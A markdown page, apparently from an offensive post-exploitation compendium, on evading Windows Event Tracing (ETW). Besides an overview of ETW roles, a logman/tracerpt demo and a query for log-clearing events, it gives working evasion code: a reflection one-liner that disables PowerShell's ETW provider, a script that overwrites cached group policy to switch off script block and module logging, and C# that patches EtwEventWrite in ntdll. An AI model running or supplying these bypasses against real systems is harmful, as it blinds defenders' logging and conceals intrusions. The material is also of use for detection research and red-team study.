killchain-compendium/post_exploitation/docs/windows/evade_event_tracing.md

# Evade Event Tracing (ETW)
* ETW feeds two logging mechanisms
  * Event Logging (the Windows Event Log channels, where each event type is identified by an Event ID)
  * Trace Logging
* __Event Provider__: generates events. Provider types differ in how many trace sessions may enable them at the same time
  * Managed Object Format (MOF, "classic"): enabled by a single trace session
  * Windows Software Trace Preprocessor (WPP), Trace Message Format (TMF): enabled by a single trace session
  * Manifest based: up to 8 trace sessions
  * TraceLogging: up to 8 trace sessions
* __Event Controller__: builds and configures trace sessions and enables or disables providers in them
* __Event Consumer__: interprets events, parsing the sessions of the selected providers
  * Events are described by an XML manifest and can be rendered as XML data (e.g. `wevtutil`, `tracerpt -of XML`)
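The three roles above, exercised end to end from PowerShell with the built-in `logman.exe` (controller) and `tracerpt.exe` (consumer). This is an added example, not code from the original page; it assumes an elevated prompt, and the session name and the paths under `$env:TEMP` are arbitrary choices made here.

```powershell
# Added example, not from the original page. Assumes an elevated prompt;
# session name and output paths are arbitrary choices.
$session  = 'PSTraceDemo'
$etl      = Join-Path $env:TEMP "$session.etl"
$xml      = Join-Path $env:TEMP "$session.xml"
$provider = 'Microsoft-Windows-PowerShell'   # a manifest-based provider

# Provider: show the provider's GUID and the keywords/levels its manifest defines
logman query providers $provider

# Controller: create and start a trace session with this provider enabled.
# The keyword mask (all) and level 5 (verbose) are passed as strings so
# PowerShell does not parse the hex mask into a signed number; -ets acts on
# the live session instead of saving a data collector definition.
logman start $session -p $provider '0xffffffffffffffff' '5' -o $etl -ets

# Any PowerShell activity now emits events into the session
powershell.exe -NoProfile -Command "Get-Date | Out-Null"

# Controller: list the live sessions (also what a defender checks when looking
# for a session that was stopped or stripped of its providers), then stop ours,
# which flushes the .etl file
logman query -ets
logman stop $session -ets

# Consumer: decode the .etl against the provider manifest into XML
tracerpt $etl -o $xml -of XML -y
Select-String -Path $xml -Pattern '<EventID>' | Select-Object -First 5
```

Every evasion technique further down attacks exactly one of these roles: silencing the provider, tampering with the controller's session or the function that feeds it, or manipulating what the consumer gets to read.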
## Log Evasion
* Clearing logs is itself tracked by dedicated event IDs. Do not do it!
  * ID 1102: the Security audit log was cleared (written to the Security log)
  * ID 104: an event log such as System or Application was cleared (written to the System log)
  * ID 1100: the event logging service has shut down (written to the Security log)
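The defender's side of the same point: a query for those three events across the logs that actually record them. This is an added example, not from the original page; it needs read access to the Security log (an elevated prompt), and the 30-day default window is an arbitrary choice.

```powershell
# Added example, not from the original page. Requires an elevated prompt;
# the default look-back window is an arbitrary choice.
function Find-LogClearingEvents {
    param([datetime]$Since = (Get-Date).AddDays(-30))

    # 1102 and 1100 are written to Security, 104 to System (all by provider
    # Microsoft-Windows-Eventlog); Get-WinEvent takes an Id array per query.
    $queries = @(
        @{ LogName = 'Security'; Id = @(1102, 1100); StartTime = $Since }
        @{ LogName = 'System';   Id = @(104);        StartTime = $Since }
    )
    foreach ($q in $queries) {
        Get-WinEvent -FilterHashtable $q -ErrorAction SilentlyContinue | ForEach-Object {
            # The clearing account lives in UserData, not in the message template.
            $x       = [xml]$_.ToXml()
            $cleared = $x.Event.UserData.LogFileCleared       # null for 1100 (ServiceShutdown)
            $subject = $null
            if ($cleared) { $subject = "$($cleared.SubjectDomainName)\$($cleared.SubjectUserName)" }
            $channel = $_.LogName
            if ($_.Id -eq 104) { $channel = $cleared.Channel }  # which log was wiped
            [pscustomobject]@{
                TimeCreated = $_.TimeCreated
                LogName     = $_.LogName
                Id          = $_.Id
                Subject     = $subject
                Channel     = $channel
                Summary     = ($_.Message -split '\r?\n')[0]
            }
        }
    }
}

Find-LogClearingEvents | Sort-Object TimeCreated | Format-Table -AutoSize
```

An empty result is only meaningful if the Security and System logs themselves have not been cleared; a 1102 or 104 with a Subject that is not a known administrator, or a 1100 outside a normal reboot, is the finding.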
### Techniques
* Provider
  * [PSEtwLogProvider modification](https://docs.microsoft.com/en-us/dotnet/standard/assembly/) through reflection on PowerShell's own .NET assembly
    * Set the private `m_enabled` field of the engine's `EventProvider` instance to `0` from a PowerShell script, so the provider considers itself disabled and stops emitting events
```powershell
# Locate PowerShell's ETW log provider type inside the engine assembly
$logProvider = [Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider')
# Read its private static EventProvider instance
$etwProvider = $logProvider.GetField('etwProvider','NonPublic,Static').GetValue($null)
# Flip the private m_enabled field to 0: the provider now reports itself as disabled and writes nothing
[System.Diagnostics.Eventing.EventProvider].GetField('m_enabled','NonPublic,Instance').SetValue($etwProvider,0);
```
  * Group policy takeover
    * PowerShell caches the logging GPO settings inside its own process, which runs in the same security context as the user, so a script can overwrite the cached values
    * The GPO-delivered logging settings concerned are script block logging and module logging
    * Event IDs reported are `4103` (module logging: logs command invocation) and `4104` (script block logging: logs script block execution)
    * GPO path: Administrative Templates -> Windows Components -> Windows PowerShell
  * Log pipeline abuse
    * `LogPipelineExecutionDetails` has to be set to `$false` on each loaded module (and PS snap-in) so that their commands no longer produce module logging events
  * Type creation
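The group policy takeover and log pipeline abuse items above, carried out together with a read-back so the operator can confirm what the engine currently believes. This is an added example, not code from the original page. It targets Windows PowerShell 5.1: the private static field `cachedGroupPolicySettings` on `System.Management.Automation.Utils` and its `ScriptBlockLogging` / `ModuleLogging` keys are an assumption about that engine version's internals (PowerShell 7 stores policy differently); `LogPipelineExecutionDetails` is a public property of `PSModuleInfo` and `PSSnapInInfo`.

```powershell
# Added example, not from the original page. Assumes Windows PowerShell 5.1;
# the cachedGroupPolicySettings field and its key names are an assumption
# about that version's internals.

function Get-CachedPolicyDictionary {
    # The cache lives in the PowerShell process, i.e. in the user's own security
    # context, so reading or overwriting it needs no privilege.
    $utils = [ref].Assembly.GetType('System.Management.Automation.Utils')
    $field = $utils.GetField('cachedGroupPolicySettings', 'NonPublic,Static')
    if (-not $field) { throw 'cachedGroupPolicySettings not found: engine version not supported' }
    return $field.GetValue($null)
}

function Disable-PSPolicyLogging {
    $cache = Get-CachedPolicyDictionary
    # An entry is cached only after the engine has consulted it, and an
    # unconfigured policy is cached as null; in both cases plant our own
    # dictionary so the engine never goes back to the registry for it.
    foreach ($policy in 'ScriptBlockLogging', 'ModuleLogging') {
        if (-not $cache.ContainsKey($policy) -or $null -eq $cache[$policy]) {
            $cache[$policy] = New-Object 'System.Collections.Generic.Dictionary[string,object]'
        }
    }
    # 4104: script block logging
    $cache['ScriptBlockLogging']['EnableScriptBlockLogging']           = 0
    $cache['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0
    # 4103: module logging (also governs modules imported from now on)
    $cache['ModuleLogging']['EnableModuleLogging'] = 0
}

function Disable-PSPipelineLogging {
    # Module logging is applied per module/snap-in at import time via
    # LogPipelineExecutionDetails; clear it on everything already loaded.
    foreach ($m in Get-Module) { $m.LogPipelineExecutionDetails = $false }
    foreach ($s in Get-PSSnapin -ErrorAction SilentlyContinue) { $s.LogPipelineExecutionDetails = $false }
}

function Get-PSLoggingState {
    # Read-back: cached policy values plus any module still flagged for logging.
    $cache = Get-CachedPolicyDictionary
    [pscustomobject]@{
        ScriptBlockLogging = $cache['ScriptBlockLogging']
        ModuleLogging      = $cache['ModuleLogging']
        ModulesStillLogged = @(Get-Module | Where-Object LogPipelineExecutionDetails | Select-Object -ExpandProperty Name)
    }
}

Disable-PSPolicyLogging
Disable-PSPipelineLogging
Get-PSLoggingState
```

Note that the script block containing these functions is compiled, and therefore logged as 4104, before the first line runs; the bypass only covers what executes afterwards in this process.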
* Controller
  * Patching `EtwEventWrite` in `ntdll.dll` via return value modification: overwrite the function prologue with an immediate return, so no event from any provider in the process reaches a trace session. `Win32` in the C# snippets stands for a caller-supplied P/Invoke wrapper class
    * Resolve the function and build the patch
```csharp
var ntdll = Win32.LoadLibrary("ntdll.dll");
var etwFunction = Win32.GetProcAddress(ntdll, "EtwEventWrite");
var patch = new byte[] { 0xc2, 0x14, 0x00 }; // ret 0x14: x86 stdcall return popping five DWORD args; on x64 use 0xC3 (ret)
```
    * Modify memory permissions
```csharp
uint oldProtect;
Win32.VirtualProtect(
    etwFunction,
    (UIntPtr)patch.Length,
    0x40,               // PAGE_EXECUTE_READWRITE
    out oldProtect
);
```
    * Copy the patch over the function prologue via `Marshal.Copy`
```csharp
Marshal.Copy(
    patch,
    0,
    etwFunction,
    patch.Length
);
```
    * Clean up: restore the original page protection
```csharp
Win32.VirtualProtect(etwFunction, (UIntPtr)patch.Length, oldProtect, out oldProtect);
```
    * Flush the instruction cache so the CPU executes the patched bytes
```csharp
Win32.FlushInstructionCache(
    Win32.GetCurrentProcess(),
    etwFunction,
    (UIntPtr)patch.Length
);
```
  * Runtime trace tampering
* Consumer
  * Log smashing
  * Log tampering